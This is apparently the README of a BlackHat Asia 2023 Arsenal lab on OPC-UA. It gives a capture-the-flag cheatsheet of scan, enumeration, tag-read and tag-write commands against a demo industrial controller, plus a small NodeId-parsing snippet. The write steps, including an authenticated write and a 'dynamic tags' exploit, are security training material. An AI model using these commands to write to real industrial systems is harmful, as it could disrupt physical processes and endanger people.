
bhasia23-opcuhack's Introduction

BlackHat Arsenal Singapore 2023: OPC-U-HACK

Slides & content for our Arsenal lab session at BlackHat Asia 2023

This arsenal lab session aims at introducing the OPC-UA protocol, a modern protocol for Industrial Control Systems. A demo setup will be provided and our tool opcua-scan will be used.

Cheatsheet

Find below a few commands that should help you capture the flags!

RECON#01

Scan the machine: nmap -p- 192.168.0.20

Look for OPC-UA services: ./opcua_scan.py hello -i 192.168.0.20 -p '49320, 49321, 49664, 49665, 49666, 49667, 49670, 49679, 49681'

RECON#02 & RECON#03

Use the IP address because there is no working DNS: ./opcua_scan.py server_config -t 'opc.tcp://192.168.0.20:49321'

RECON#04

List nodes that you can write to: ./opcua_scan.py server_config -t 'opc.tcp://192.168.0.20:49320' -nw

List all the nodes: ./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320'

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'i=85'

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150'
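The -r values above are OPC UA NodeId strings: an optional namespace index (ns=, defaulting to 0, the standard namespace) followed by a typed identifier, where i=85 is the standard Objects folder. The Python sketch below is an added example, not code from opcua-scan or from the original README; it parses and validates that string format, and the names NodeId, parse_node_id and describe are illustrative.

```python
import base64
import re
import uuid
from dataclasses import dataclass

# NodeId string form: [ns=<index>;]<type>=<identifier>
# <type>: i = numeric, s = string, g = GUID, b = opaque bytes (base64)
_NODE_ID = re.compile(r"(?:ns=([0-9]+);)?([isgb])=(.*)", re.DOTALL)

# Well-known numeric nodes in the standard namespace (ns=0)
WELL_KNOWN = {84: "RootFolder", 85: "ObjectsFolder",
              86: "TypesFolder", 87: "ViewsFolder"}


@dataclass(frozen=True)
class NodeId:
    namespace: int      # 0 = OPC UA standard namespace, >0 = server-defined
    id_type: str        # one of "i", "s", "g", "b"
    identifier: object  # int, str, uuid.UUID or bytes


def parse_node_id(text: str) -> NodeId:
    """Parse and validate a NodeId string; raise ValueError if malformed."""
    m = _NODE_ID.fullmatch(text)
    if m is None:
        raise ValueError(f"not a NodeId string: {text!r}")
    ns = int(m.group(1) or 0)          # "ns=" omitted means namespace 0
    if ns > 0xFFFF:                    # namespace index is a UInt16
        raise ValueError(f"namespace index out of range: {ns}")
    kind, raw = m.group(2), m.group(3)
    if kind == "i":
        if not re.fullmatch(r"[0-9]+", raw) or int(raw) > 0xFFFFFFFF:
            raise ValueError(f"numeric identifier must be a UInt32: {raw!r}")
        return NodeId(ns, kind, int(raw))
    if kind == "g":
        return NodeId(ns, kind, uuid.UUID(raw))   # ValueError if not a GUID
    if kind == "b":
        return NodeId(ns, kind, base64.b64decode(raw, validate=True))
    return NodeId(ns, kind, raw)       # string ids may contain ';' and '='


def describe(text: str) -> str:
    """One-line summary of a NodeId, naming well-known ns=0 folders."""
    node = parse_node_id(text)
    if node.namespace == 0 and node.id_type == "i":
        name = WELL_KNOWN.get(node.identifier, "standard node")
        return f"ns=0 numeric {node.identifier} ({name})"
    return f"ns={node.namespace} {node.id_type}-type {node.identifier!r}"
```
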

RECON#05

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320'

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'i=85'

READ_DATA#01

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150.Device2.XXX'

READ_DATA#02

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150.Device2.XXX'

WRITE_DATA#01

./opcua_scan.py write_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150.Device2.part_1_up' -d True

WRITE_DATA#02

This one is a little bit more complex! Several steps are involved, one of which is exploiting dynamic tags.

./opcua_scan.py write_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150.Device2.XXXX' -a Username -u XXX -p XXX -d True
